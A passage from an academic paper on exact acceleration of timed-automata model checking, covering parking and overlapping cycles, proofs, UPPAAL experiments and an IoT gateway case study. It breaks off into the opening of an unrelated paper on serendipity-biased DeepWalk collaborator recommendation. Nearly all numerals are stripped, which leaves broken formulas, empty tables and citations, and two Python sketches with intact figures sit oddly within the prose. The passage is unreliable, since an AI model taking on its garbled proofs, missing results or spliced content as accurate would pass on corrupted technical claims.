is to determine the number of executions. so, without loss of generality, we might assume that the execution number is a positive integer n. let n be the rounds of cycle execution, and let the interval [c,d] be the clock zone at the reset location before execution of the cycle. at the reset location, the clock zone is continuous from the (n+ )th time onward; therefore, the clock zones obtained in the (n+ )th time and the nth time have an intersection that is (n+ )a+c ≤nb+d ⇒n≥(a+c−d)/(b−a). because b>a, d ≥c, there must be an integer n≥a/(b−a). so, the number of executions should be at least da/(b−a)e. when the cycle is executed da/(b−a)e (that is n) times, the reset location obtains a continuous clock zone, thereby completing the proof. corollary . if the timed automaton m has an acceleratable cycle with a window of [a,b], a<b, then the reset location will obtain a continuous clock zone after executing the cycle at least a/(b−a) times during forward symbolic reachability analysis. proof. according to theorem , we easily know the reset location obtains a continuous clock zone when the cycle is executed n times. for the integer n, we can calculate that n≥a/(b−a). the proof is completed. corollary . let the global clock be y, and let the maximum value of y before entering the acceleratable cycle be n . 
if the timed automaton m has an acceleratable cycle with a window of [a,b], a < b, then the reset location will obtain a continuous clock zone when the following condition is satisfied during forward symbolic reachability analysis: y − n ≥ a × a/(b−a). proof. according to corollary , the reset location will obtain a continuous clock zone after executing the acceleratable cycle at least a/(b−a) times. because the window of the acceleratable cycle is [a,b], the increment of y obtained by executing the acceleratable cycle a/(b−a) times, namely y − n , lies in [a × a/(b−a), b × a/(b−a)]. therefore, when y − n ≥ a × a/(b−a), the reset location will obtain a continuous clock zone. the proof is completed. corollary . let the global clock be y, and let the maximum value of y before entering the acceleratable cycle be n . if the timed automaton m has an acceleratable cycle with a window of [a,b], a < b, then every location in the acceleratable cycle will obtain a continuous clock zone when y − n ≥ a × a/(b−a). proof. because clock y is not the cycle clock, no invariant or guard in the acceleratable cycle contains clock y according to definition . based on the theory of timed automata, clock y grows monotonically while the acceleratable cycle is executed. thus, when y − n ≥ a × a/(b−a), per corollary , the reset location begins to obtain a continuous clock zone, indicating that every location in the acceleratable cycle is reachable. at this point, a continuous clock zone is also obtained by every location in the acceleratable cycle, and the proof is completed. next, we give the new proof of theorem . proof. sufficient condition. the known condition is a < b. because accp(m,cycle) is obtained by adding a parking cycle to m, the timed automaton m can clearly reach any state that is reachable in the original model, and the accelerated automaton accp(m,cycle) can also reach these states by executing the same timed trace; that is, the state transition system s(m) associated with m is included in the state transition system s(accp(m,cycle)) associated with accp(m,cycle). necessary condition. the known condition is a < b. let the global clock be y. when y < a × a/(b−a) + n , the accelerated automaton accp(m,cycle) does not execute the parking cycle, and the reachable states of accp(m,cycle) are also reachable in the timed automaton m. when y ≥ a × a/(b−a) + n , according to corollary every location in the acceleratable cycle of m obtains a continuous clock zone; that is, at any time after y ≥ a × a/(b−a) + n , m can reach any location in the acceleratable cycle, while accp(m,cycle) can execute the parking cycle, satisfy its edge guard, and return to the reset location from any such state, so every state it reaches is also reachable in m. in summary, when a < b, the accelerated automaton accp(m,cycle) does not change the reachability property ϕ of the timed automaton m, and the proof is completed. according to our theorems and corollaries, we can show that the exact acceleration method based on the parking cycle is more concise and effective than that based on the appended cycle. on the one hand, there is no location invariant in the parking cycle, so the clock can stay in that location as long as needed for acceleration; on the other hand, the parking cycle contains an edge guard that ensures that every location of the acceleratable cycle obtains a continuous clock zone, which provides reachability.
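the bound ⌈a/(b−a)⌉ from the corollaries above and the parking-cycle entry guard a × ⌈a/(b−a)⌉ + n can be computed directly from a window [a,b]. a minimal sketch, using a hypothetical window rather than the window of the running example:

import math

def min_rounds(a, b):
    # smallest n with (n+1)*a <= n*b, i.e. n >= a/(b-a): from this round on,
    # consecutive zones [k*a, k*b] at the reset location overlap
    assert a < b
    return math.ceil(a / (b - a))

def parking_guard(a, b, n0=0):
    # entry guard of the parking cycle: y >= a * ceil(a/(b-a)) + n0, with n0
    # the maximal value of y before the cycle is entered
    return a * min_rounds(a, b) + n0

a, b = 7, 9                                   # hypothetical window
n = min_rounds(a, b)                          # 4 rounds here
print(n, parking_guard(a, b))                 # 4, 28
print([(k * a, k * b) for k in range(1, n + 3)])
# from the n-th round onward every zone overlaps its successor:
assert all((k + 1) * a <= k * b for k in range(n, n + 10))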
in this way, the parking cycle accelerates the search for symbolic states by controlling the acceleration timing and preserves the reachability of the timed automaton, thereby realizing exact acceleration. the exact acceleration method for the complex real-time model based on an overlapping cycle is an improved method based on the parking cycle. it attempts to extend the application field of exact acceleration technology to complex real-time model checking, to improve efficiency and alleviate state explosion. theorem . let m = (c,l,l ,a,i,e) be a timed automaton with several acceleratable cycles. let cyclei = (eci,x) be the ith acceleratable cycle of m with a window of [ai,bi], where i is a non-zero natural number. all acceleratable cycles share the cycle clock x, and their reset locations coincide in lreset ∈ l. then a single acceleratable cycle is more effective in obtaining a continuous clock zone than multiple acceleratable cycles used together. proof. let nj = ⌈aj/(bj−aj)⌉ × aj and nk = ⌈ak/(bk−ak)⌉ × ak, where j, k ≤ i and j, k are non-zero natural numbers. then nj and nk represent the edge guards of the jth and kth acceleratable cycles, respectively, when a parking cycle is added. if these two acceleratable cycles are executed simultaneously, the edge guard can be expressed as njk = ⌈(aj+ak)/((bj−aj)+(bk−ak))⌉ × (aj+ak). the window of the ith acceleratable cycle is [ai,bi] by assumption, where aj ≤ bj and ak ≤ bk, and so aj+ak ≥ aj, ak. we write aj/(bj−aj) = u/v and ak/(bk−ak) = x/y, so that (aj+ak)/((bj−aj)+(bk−ak)) = (u+x)/(v+y). assume that u/v is the smaller of the two; then x/y = (u+µ)/v for some µ ∈ r+. therefore (u+x)/(v+y) = (2u+µ)/(2v) = u/v + µ/(2v) > u/v; that is, ⌈(u+x)/(v+y)⌉ ≥ ⌈u/v⌉ and ⌈(u+x)/(v+y)⌉ ≥ min(⌈u/v⌉, ⌈x/y⌉). for positive numbers, the product of the two larger factors is at least the product of the two smaller factors; therefore ⌈(u+x)/(v+y)⌉ × (aj+ak) ≥ min(⌈u/v⌉ × aj, ⌈x/y⌉ × ak), which is njk ≥ min(nj,nk). according to corollary , during forward symbolic reachability analysis the reset location obtains a continuous clock zone after the acceleratable cycle with the smaller value of ⌈ai/(bi−ai)⌉ × ai has been executed ⌈ai/(bi−ai)⌉ times. this is faster than using the two acceleratable cycles simultaneously to obtain a continuous clock zone, and it is better than using the larger one. by extension, when comparing any two acceleratable cycles, the cycle with the shorter time always obtains a continuous clock zone more quickly, and when comparing all acceleratable cycles we can select the most effective one for exact acceleration. this result indicates that the acceleration effect of a single acceleratable cycle is more effective than that of multiple acceleratable cycles, thereby completing the proof. corollary . let m = (c,l,l ,a,i,e) be a timed automaton with several acceleratable cycles. let cyclei = (eci,x) be the ith acceleratable cycle of m with a window of [ai,bi], where i is a non-zero natural number. all acceleratable cycles share the cycle clock x, and their reset locations coincide in lreset ∈ l. if ai < bi, then the acceleratable cycle with the minimal ⌈ai/(bi−ai)⌉ × ai has the best acceleration effect, obtaining a continuous clock zone in the shortest time. proof.
according to theorem , comparing any two acceleratable cycles, the cycle with the smaller value of ⌈ai/(bi−ai)⌉ × ai always obtains a continuous clock zone more quickly. when comparing all acceleratable cycles, the cycle with the minimal ⌈ai/(bi−ai)⌉ × ai obviously gives the most effective acceleration. the proof is completed. definition (accelerated automaton based on overlapping cycle). let m = (c,l,l ,a,i,e) be a timed automaton with k acceleratable cycles, where l = {l ,l ,...,lm}. cycle = {cycle ,...,cyclek | k ∈ n+} denotes the set of acceleratable cycles. let cyclei = (eci,x) be the ith acceleratable cycle with a window of [ai,bi], where ≤ i ≤ k, ec = (e ,e ,...,en− ), eji = (lji,aji,τji,λji,l(j+ )i). all acceleratable cycles share the cycle clock x, and their reset locations coincide in lreset ∈ l. the global clock is y, and the maximum value of y before entering the acceleratable cycle is n . the acceleration of m based on the overlapping cycle is a new automaton acco(m,cycle) defined as (c,l′,l ,a,i′,e′), where • l′ = l ∪ {l′reset} • i′(lh) = i(lh), ≤ h ≤ m • i′(l′reset) = ∅ • e′ = e ∪ {(lreset,∅,τ′,∅,l′reset), (l′reset,∅,∅,λ′,lreset)}, where τ′ is y ≥ min(⌈ai/(bi−ai)⌉ × ai) + n and λ′ contains only x. the accelerated automaton acco(m,cycle) equals the timed automaton m with an overlapping cycle added at only one reset location, which solves the problem that exact acceleration cannot be used directly for complex real-time model checking. the overlapping cycle only requires analyzing the windows of all acceleratable cycles in cycle for its calculation, and it avoids adding an appended cycle or a parking cycle for each acceleratable cycle, greatly reducing the number of added symbolic states. figure depicts the acceleration of m′ (fig. ) based on an overlapping cycle, named the accelerated automaton m′o. because the timed automaton m′ contains four acceleratable cycles, we analyze them separately, discard the deadlocked cycle, and retain only three executable cycles; the deadlocked cycle consists of the locations l , l , l , l , l , l , l , l , l , l , l , l , l in sequence. for further analysis, the windows of the acceleratable cycles are calculated as [ , ], [ , ], and [ , ]. by taking the minimum value of ⌈ai/(bi−ai)⌉ × ai, we obtain the overlapping cycle’s entry condition, which is y ≥ . theorem . let m = (c,l,l ,a,i,e) be a timed automaton with several acceleratable cycles. let cyclei = (eci,x) be the ith acceleratable cycle of m with a window of [ai,bi], where i is a non-zero natural number. if x is reset on edge e , then the subsequent states of src(e ) that are reachable by multiple acceleratable cycles in m are reachable by exactly one execution of the overlapping cycle in acco(m,cycle). proof. for a certain acceleratable cycle, let its window be [a′,b′]. according to theorem , when a′ ≤ b′, the appended cycle does not change the subsequent reachability of the reset location src(e ) in m. according to theorem , when a′ ≤ b′, the parking cycle does not change the subsequent reachability of the reset location src(e ) in m. in the case of multiple acceleratable cycles superimposed on the same location in a complex real-time system, the subsequent reachability of the reset location src(e ) in m is guaranteed to remain unchanged if any one of the acceleratable cycles is processed with exact acceleration. according to theorem , the acceleratable cycle is more effective for obtaining a continuous clock zone at the reset location src(e ) than multiple acceleratable cycles; in particular, according to corollary , if ai < bi, then the exact acceleration based on the overlapping cycle obtains the continuous clock zone in the shortest time. the proof is completed.
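the entry guard of the overlapping cycle in the definition above is obtained purely from the windows of the acceleratable cycles. a minimal sketch of that computation, with hypothetical windows (the concrete windows of m′ are not reproduced here), together with a numeric check of the inequality njk ≥ min(nj, nk) proved above:

import math

def cycle_cost(a, b):
    # per-cycle quantity ceil(a/(b-a)) * a used in the corollaries above
    assert a < b
    return math.ceil(a / (b - a)) * a

def overlapping_guard(windows, n0=0):
    # entry guard of the single overlapping cycle:
    # y >= min_i ceil(a_i/(b_i - a_i)) * a_i + n0
    return min(cycle_cost(a, b) for a, b in windows) + n0

windows = [(7, 9), (10, 14), (5, 6)]            # hypothetical windows
print([cycle_cost(a, b) for a, b in windows])   # [28, 30, 25]
print(overlapping_guard(windows))               # entry condition: y >= 25

# treating two cycles as one combined cycle never beats the better single one
aj, bj, ak, bk = *windows[0], *windows[1]
combined = math.ceil((aj + ak) / ((bj - aj) + (bk - ak))) * (aj + ak)
assert combined >= min(cycle_cost(aj, bj), cycle_cost(ak, bk))   # 51 >= 28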
/peerj-cs. figure automaton m ′o: acceleration of m ′ based on an overlapping cycle. full-size doi: . /peerjcs. /fig- wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table runtime data comparing m ′ and its accelerated versions ma′ , mp′ and mo′ . large mem (kb) , , , , , , m ′ time (s) . . . . . , . mem (kb) , , , , , m ′ a time (s) . . . . . . mem (kb) , , , , , , m ′ p time (s) . . . . . . mem (kb) , , , , , , m ′ o time (s) . . . . . . according totheorem , the accelerablecycle is moreeffective for obtaininga continuous clock zone at reset location src(e ) than multiple acceleratable cycles. in particular, according to corollary , if ai < bi, then the exact acceleration based on overlapping cycle can obtain the continuous clock zone in the shortest time. the proof is completed. this theorem ensures the effectiveness of acceleration. for a single acceleratable cycle, if all states are reachable by more than one execution of the acceleratable cycle, then exactly only one execution of the acceleratable cycle of the appended cycle or parking cycle can guarantee reachability of all states in the accelerative automaton. the complex real-time model checking differs from the exact acceleration of a single acceleratable cycle. in depth-first forward symbolic reachability analysis, it is necessary to verify whether subsequent states are reachable in priority while ignoring the breadth-first search within cycles. in our case study of an iot gateway security system (wang et al., ), the control center must complete a security process and distribute it to each sensor node. once a self-organizing sensor network completes the process, it can respond to the command of the control center in a timely manner. the control center can perform subsequent operations after receiving feedback regardless of whether other sensor nodes can complete the process. hence, the security system must ensure its subsequent reachability regardless of who completes the process. this approach accelerates the search of subsequent states, thus avoiding time and space consumption caused by superposition of acceleratable cycles. experimental results to verify the validity of the exact acceleration method based on an overlapping cycle for complex real-time model checking, we collected runtime data, including memory consumption and verification time, from the timed automaton m ′. we also gathered runtime data from the accelerated automata m ′ a, m ′ p, and m ′ o, which use the appended cycle, parking cycle, and overlapping cycle, respectively. we employed the model-checking tool uppaal with a depth-first search order to verify whether location l was reachable, which can give the time and memory consumption in verification automatically. experimental results are displayed in table . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure technical framework of iot gateway security system. full-size doi: . /peerjcs. /fig- results show that the time consumption of m ′ increased with exponential growth of large at a rate of nearly ten times without using exact acceleration. the memory consumption of m ′ increased slightly because no additional locations were added. the accelerated automaton m ′ a used an appended cycle, which reduced the time consumption, reflecting the advantages of exact acceleration. 
however, due to a large number of additional locations, the memory consumption of m ′ a increased dramatically. the accelerated automaton m ′ p used a parking cycle to reduce the time consumption further compared to m ′ a. the fixed length of the parking cycle reduced the number of additional locations compared to the appended cycle; accordingly, the memory consumption was much lower for m ′ p than for m ′ a but slightly higher than for m ′. the accelerated automaton m ′ o that used the proposed overlapping cycle exhibited minimal time consumption and only required the addition of a single, fixed-length location for the complex real-time model. the memory consumption of m ′ o was close to that of m ′, far less than that of m ′ a, and slightly better than that of m ′ p. we can explain the time and memory consumption of m ′ o by theorem . the depth-first search order ensures that the overlapping cycle accelerates exploration before complete exploration of all accelerable cycles. a less theoretical study case involves model verification of the iot gateway security system (wang et al., ). the exact acceleration method based on the overlapping cycle was successfully applied in this case, significantly improving verification efficiency. the technical framework of the iot gateway security system is illustrated in fig. . an essential technology in the iot gateway security system is the time-stamped advanced encryption standard algorithm. by introducing a timestamp into the key expansion phase, the round key can be dynamically updated with change over time to realize a cipher text change that ensures the security of confidential information. due to the introduction of a timestamp, the system generates acceleratable cycles when modeled as timed automata. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. multiple acceleratable cycles are overlaid on the same location in particular scenarios, which requires overlapping cycle technology for exact acceleration. our theory can be used to simulated the parallel execution of processes and idle cycles. however, the presence of urgent locations and synchronous channels may disturb exact acceleration. for example, if broadcast channel coordination occurs in an urgent location, the multi-party response of the broadcast should be completed before the next state location can be migrated. the execution time of the response process is not controlled by the cycle control program; thus, it is not appropriate to simply use exact acceleration technology for acceleration; the space–time loss of using acceleration technology should be compared to the broadcasting response. however, exact acceleration technology can often handle urgent locations and synchronous channels. the following case of an iot gateway security system also involves these situations. as no extra time interference exists within the whole acceleration process, the exact acceleration technology can finally be successfully applied to system modeling and verification. the accelerated automaton based on an overlapping cycle is an approximation that can be adapted to verify the accuracy of invariance and reachability properties. consider the processes in fig. ; these processes model a top architecture and a middleware control program consisting of locations, edges, and channels. the iot gateway runs from the start location, reads configuration information and performs gateway identity authentication. 
the underlying unified authentication service is invoked through channel startac for security authentication, and gatewaystatus is returned after authentication. if gatewaystatus =true, then the system enters the location entermiddle and transforms to the polling module of the middle layer through the startmiddle channel. for the middle-layer polling module, polling begins through the startmiddle channel, and the top-layer main module is returned by the finishmiddle channel. location checkcategory controls whether polling logic ends up at a perception terminal or an execution terminal, which each have different processing methods. in the two polling processes, the underlying security service is invoked through the synchronization channel according to different requirements. the specific process can be interpreted by the meaning of state locations, synchronization channels, and variables as described by wang et al. ( ). in particular, clock constraints are added during the stage of waiting for timing and the stage of keeping the equipment running. the top-layer main module model and middle-layer polling module model constitute the general framework of the iot gateway security system. security implementation depends on the underlying security service modules ultimately, hence it is necessary to improve model construction of the underlying security service modules. for complex system modeling with underlying services, we apply the exact acceleration method proposed in this paper, which can effectively improve the verification speed. to demonstrate the effect of exact acceleration, we checked all security properties of the iot gateway security system model in fig. . several examples are presented below. ( ) a[] not deadlock property is used to check deadlock and ensure all state locations will be reachable. ( ) e<>top.checkgs wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure part of the iot gateway security system model. full-size doi: . /peerjcs. /fig- ( ) e<>top.entermiddle imply middle.checkcategory properties and are used to explore part of the state space. the truth of these two properties indicates that the implementation accelerated model is an exact acceleration with the overlapping cycle. ( ) a[] top.restart imply c<= ( ) a[] top.record imply c<= ( ) a[] middle.retrievedata imply middle.y>= ( ) a[] middle.waitdevice imply middle.y<= properties – are examined in terms of whether subsequent states of the reset location are reachable. clock c is a global clock and clock y is used to model the duration of one process. we measured time and memory consumption and explored states for these properties. the iot gateway security system was modeled as a timed automaton miot , and the acceleration of miot with overlapping cycles was modeled as an automaton mioto. we used model checkers uppaal and kronos to verify security system properties automatically, such as confidentiality, availability, and authenticity in parallel processes. kronos is able wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table runtime data comparing miot and mioto. explored states time(s) memory(kb) miot , . , mioto , . , table comparing the performance of different exact acceleration techniques for large-scale iot sys- tems. system states-scale exact acceleration technique verification time(s) appended cycle . parking cycle . overlapping cycle . 
table : runtime data comparing miot and mioto, reporting the number of explored states, the verification time (s), and the memory consumption (kb) for each automaton.

table : verification time (s) of the different exact acceleration techniques (appended cycle, parking cycle, and overlapping cycle) on large-scale iot systems of increasing state scale; the appended cycle fails to terminate (∞) at the second state scale and the parking cycle fails at the largest scale, while the overlapping cycle completes at every scale.

table lists the experimental results. on the premise of guaranteeing the security of the iot gateway system, a large number of underlying services and various applications can be embedded in the system framework. at that point, the security requirements of the iot gateway system mainly concern the newly connected services, while the framework security of the gateway itself can be maintained by its own mechanisms. after a large number of services and applications are connected, the original model becomes complex, concurrent, real-time, and large-scale, and its verification needs to be handled by the exact acceleration method based on the overlapping cycle. as the number of connected services grows, the system model becomes more and more complex, and the number of connected services greatly affects the efficiency of model verification. the appended cycle and parking cycle methods are better suited to scenarios with a single acceleratable cycle; in this complex scenario, once the number of services reaches a certain level, their acceleration process may not complete. table compares the acceleration effects (in terms of verification time) of the different exact acceleration methods as the number of connected services changes. the results show that, for complex real-time systems, the acceleration efficiency of the overlapping cycle is much higher than that of the appended cycle and the parking cycle, and verification can still be completed with the proposed method at the largest state scale tested. the exact acceleration technology therefore substantially reduces the time required for verification in complex real-time model checking.

overlapping cycle acceleration demonstrated the highest efficiency compared to the appended cycle and the parking cycle. in the simple example of automaton m′ in fig. , additional locations were required when the appended cycle was used, far more than the number of locations in the original model. although the appended cycle reduced the verification time, it increased the difficulty of adding locations to the model at an early stage. when many acceleratable cycles were stacked at the same reset position, more than one location had to be added to m′ when the parking cycle was used, even though the length of the parking cycle is fixed. the parking cycle was neither simpler nor faster than the overlapping cycle, and its preliminary computation was larger than that of the overlapping cycle. beyond this iot case, our approach can be applied to other scenarios, such as the security validation of blockchain smart contracts. the complete code and uppaal model can be found at https://github.com/iegqwang/uppaal.

conclusions

to solve the fragmentation problem in complex real-time model checking, we propose an exact acceleration method based on an overlapping cycle, an application-scenario extension of the parking-cycle technique, to accelerate forward symbolic reachability analysis.
compared with the appended cycle or parking cycle for exact acceleration, the proposed method can be applied to the model acceleration of large-scale complex real-time systems and only requires the addition of a single, fixed-length location to the system’s timed automaton model. the addition of an overlapping cycle introduces far fewer symbolic states than using either an appended cycle or parking cycle. rather than relying on windows of acceleratable cycles, the proposed accelerated automaton model is more straightforward and reduces the space–time overhead of exact acceleration. two aspects warrant exploration in future research. first, we must continue to study the algorithm for the acceleratable cycle, try to simplify the original automaton model, guarantee its original property, and rapidly identify the deadlock. second, we plan to develop a simple exact acceleration automatic checking platform that can consider other practical conditions such as action transitions, urgent locations, and synchronous channels to solve actual modeling problems more efficiently. additional information and declarations funding this work was supported by the key program of the national natural science foundation of china (no. u ), the key scientific research project of higher education of henan (no. a , a and a ), and the key r&d and promotion project in science and technology of henan (no. ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: key program of the national natural science foundation of china: u . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/iegqwang/uppaal http://dx.doi.org/ . /peerj-cs. key scientific research project of higher education of henan: a , a , a . key r&d and promotion project in science and technology of henan: . competing interests the authors declare there are no competing interests. author contributions • guoqing wang conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • lei zhuang conceived and designed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • yu song analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • mengyang he performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • ding ma performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • ling ma analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: codes are available at github: https://github.com/iegqwang/uppaal. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aceto l, bouyer p, burgueño a, larsen kg. . the power of reachability testing for timed automata. theoretical computer science ( ): – doi . /s - ( ) - . alur r, dill dl. . a theory of timed automata. theoretical computer science ( ): – doi . / - ( ) - . barnat j, bauch p, brim l, Češka m. . employing multiple cuda devices to accel- erate ltl model checking. 
in: international conference on parallel and distributed systems, . piscataway: ieee, – doi . /icpads. . . behrmann g, bouyer p, larsen kg, pelánek r. . lower and upper bounds in zone- based abstractions of timed automata. international journal on software tools for technology transfer ( ): – doi . /s - - - . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/iegqwang/uppaal http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /icpads. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. behrmann g, david a, larsen kg. . a tutorial on uppaal. in: international school on forman methods for the design of computer, communication and software systems, . berlin: springer verlag, – doi . / - - - - _ . boudjadar a, david a, kim jh, larsen kg, mikučionis m, nyman u, skou a. . statistical and exact schedulability analysis of hierarchical scheduling systems. science of computer programming : – doi . /j.scico. . . . chadli m, kim jh, larsen kg, legay a, naujokat s, steffen b, traonouez lm. . high-level frameworks for the specification and verification of scheduling problems. international journal on software tools for technology transfer ( ): – doi . /s - - - . chen h, cui l. . design and model checking of service-oriented software architec- ture for internet of things: a survey. chinese journal of computers ( ): – doi . /sp.j. . . . cruz jp, kaji y, yanai n. . rbac-sc: role-based access control using smart contract. ieee access : – doi . /access. . . dubout c, fleuret f. . accelerated training of linear object detectors. in: com- puter vision and pattern recognition workshops, . piscataway: ieee, – doi . /cvprw. . . gou l, li z, wang c, zhuang l. . a method to determine the exact acceleration efficiency in model checking. journal of zhongyuan university of technology ( ): – doi . /j.issn. - . . . . grishchenko i, maffei m, schneidewind c. . foundations and tools for the static analysis of ethereum smart contracts. in: computer aided verification, . berlin: springer verlag, – doi . / - - - - _ . han d, yang q, xing j. . uml-based modeling and formal verification for software self-adaptation. journal of software ( ): – doi . /j.cnki.jos. . hendriks m, larsen kg. . exact acceleration of real-time model checking. electronic notes in theoretical computer science ( ): – doi . /s - ( ) - . herbreteau f, srivathsan b, walukiewicz l. . better abstractions for timed automata. information and computation : – doi . /j.ic. . . . iversen tk, kristoffersen kj, larsen kg, laursen m, madsen rg, mortensen sk, pettersson p, thomasen cb. . model-checking real-time control programs: verifying lego r© mindstromstm systems using uppaal. in: euromicro conference on real-time systems, . piscataway: ieee, – doi . /emrts. . . jeong h, yoo y, yi km, choi jy. . two-stage online inference model for traf- fic pattern analysis and anomaly detection. machine vision and applications ( ): – doi . /s - - . konur s, fisher m, schewe s. . combined model checking for temporal, probabilistic, and real-time logics. theoretical computer science : – doi . /j.tcs. . . . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sp.j. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /cvprw. . 
http://dx.doi.org/ . /j.issn. - . . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.cnki.jos. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.ic. . . http://dx.doi.org/ . /emrts. . http://dx.doi.org/ . /s - - http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . /peerj-cs. lee j, yu s, park k, park y, park y. . secure three-factor authentication protocol for multi-gateway iot environments. sensors ( ): – doi . /s . li g, wei q, li l, jin z, xu y, zheng l. . environment based modeling approach for services in the internet of things. science china press ( ): – doi . /n - . lin k, chen y, xu d. . reliability assessment model considering heterogeneous population in a multiple stresses accelerated test. reliability engineering & system safety : – doi . /j.ress. . . . möller mo. . parking can get you there faster: model augmentation to speed up real-time model checking. electronic notes in theoretical computer science ( ): – doi . /s - ( ) - . pinisetty s, jéron t, tripakis s, falcone y, marchand h, preoteasa v. . pre- dictive runtime verification of timed properties. journal of systems and software : – doi . /j.jss. . . . qanadilo m, samara s, zhao y. . c. in: latin-american symposium on dependable computing, . piscataway: ieee, – doi . /ladc. . . wang c, pastore f, briand l. . oracles for testing software timeliness with un- certainty. acm transactions on software engineering and methodology ( ): – doi . / . wang g, zhuang l, wang r, song y, zhang k. . modeling and verifying based on timed automata of internet of things gateway security system. journal on communications ( ): – doi . /j.issn. - x. . wang h, zhong d, zhao t, ren f. . integrating model checking with sysml in complex system safety analysis. ieee access : – doi . /access. . . yin c, song w, zhuang l. . method of acceleratable cycles in identify timed automata. computer engineering and design ( ): – doi . /j.issn - . . . . yin c, zhuang l, wang c. . exact acceleration of real-time model checking based on parking cycle. acta electronica sinica ( ): – doi . /j.issn. - . . . . zhang f, bu l, wang l, zhao j, li x. . modeling and analysis of wireless sensor network protocols by stochastic timed automata and statistical model checking. scientia sinica informationis ( ): – doi . / - . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s http://dx.doi.org/ . /n - http://dx.doi.org/ . /j.ress. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /ladc. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.issn. - x. http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.issn - . . . http://dx.doi.org/ . /j.issn. - . . . http://dx.doi.org/ . / - http://dx.doi.org/ . /peerj-cs. submitted october accepted february published march corresponding author liangtian wan, wan.liangtian. @ieee.org academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright xu et al. distributed under creative commons cc-by . open access a serendipity-biased deepwalk for collaborators recommendation zhenzhen xu, yuyuan yuan, haoran wei and liangtian wan key laboratory for ubiquitous network and service software of liaoning province, school of software, dalian university of technology, dalian, liaoning, china abstract scientific collaboration has become a common behaviour in academia. various recommendation strategies have been designed to provide relevant collaborators for the target scholars. 
however, scholars are no longer satisfied with the acquainted collaborator recommendations, which may narrow their horizons. serendipity in the recommender system has attracted increasing attention from researchers in recent years. serendipity traditionally denotes the faculty of making surprising discoveries. the unexpected and valuable scientific discoveries in science such as x-rays and penicillin may be attributed to serendipity. in this paper, we design a novel recommender system to provide serendipitous scientific collaborators, which learns the serendipity-biased vector representation of each node in the co-author network. we first introduce the definition of serendipitous collaborators from three components of serendipity: relevance, unexpectedness, and value, respectively. then we improve the transition probability of random walk in deepwalk, and propose a serendipity-biased deepwalk, called seren vec. the walker jumps to the next neighbor node with the proportional probability of edge weight in the co-author network. meanwhile, the edge weight is determined by the three indices in definition. finally, top-n serendipitous col- laborators are generated based on the cosine similarity between scholar vectors. we conducted extensive experiments on the dblp data set to validate our recommendation performance, and the evaluations from serendipity-based metrics show that seren vec outperforms other baseline methods without much loss of recommendation accuracy. subjects data mining and machine learning, data science, network science and online social networks, social computing keywords deepwalk, collaborators recommendation, serendipity, vector representation learning, scholarly big data introduction in academia, the rapid accumulation of scholarly data has produced an overload of academic information, and scholars are lost in it because of the difficulty in accessing useful information. the appearance of a recommender system alleviates the problem, i.e., providing relevant collaborators for target scholars, which focuses on improving the recommendation accuracy. most recommendation approaches build the profiles of target scholars based on their interests or research contents, and then provides a list of collaborators who have similar profiles with them. however, researchers are no longer satisfied with the relevant or acquainted recommendations, which may narrow their horizons in the long term. furthermore, how to cite this article xu z, yuan y, wei h, wan l. . a serendipity-biased deepwalk for collaborators recommendation. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:wan.liangtian. @ieee.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. accuracy is not the absolute metric in determining good recommendation performance, and it sometimes hurts the recommender systems for lacking novelty and diversity (sean, mcnee & konstan, ; mcnee, riedl & konstan, ). under this circumstance, serendipity is taken into consideration in terms of satisfying users when designing or evaluating the recommender systems (kotkov, wang & veijalainen, ). the concept of serendipity can be understood flexibly in most cases, which has different implications under different scenarios. additionally, the serendipitous encounters are rare in both academia and daily life of researchers. 
